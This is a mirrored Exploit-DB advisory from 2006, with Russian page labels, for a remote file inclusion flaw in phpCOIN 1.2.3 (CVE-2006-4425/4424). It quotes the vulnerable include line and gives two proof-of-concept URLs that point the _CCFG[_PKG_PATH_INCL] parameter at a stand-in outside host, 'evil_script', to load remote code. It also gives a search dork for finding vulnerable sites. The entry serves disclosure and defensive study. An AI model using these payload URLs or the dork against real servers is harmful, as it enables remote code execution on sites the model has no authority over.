- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 2254
- Проверка EDB
-
- Пройдено
- Автор
- TIMQ
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2006-4425 cve-2006-4424
- Дата публикации
- 2006-08-24
Код:
phpCOIN 1.2.3 (_CCFG[_PKG_PATH_INCL]) Remote Include Vulnerability
##################################################################
Discovered by: Timq
http://www.securitydb.org
##################################################################
Email: timq[at]hackernetwork[dot]com
http://www.securitydb.org
##################################################################
Vulnerable: require_once include ($_CCFG['_PKG_PATH_INCL'].'redirect.php');
###################################################################
Exploit PoC:
http://www.site.com/[path]/coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://evil_script?
http://www.site.com/[path]/includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://evil_script?
Dork: Powered By phpCOIN 1.2.3
####################################################################
Shoutz: Warpboy,Z66,Gammarays,Archangel,BliTz,Splinter,InTel,ErazerZ,Maggot,PunKerX,Infiltration
#####################################################################
# milw0rm.com [2006-08-24]- Источник
- www.exploit-db.com
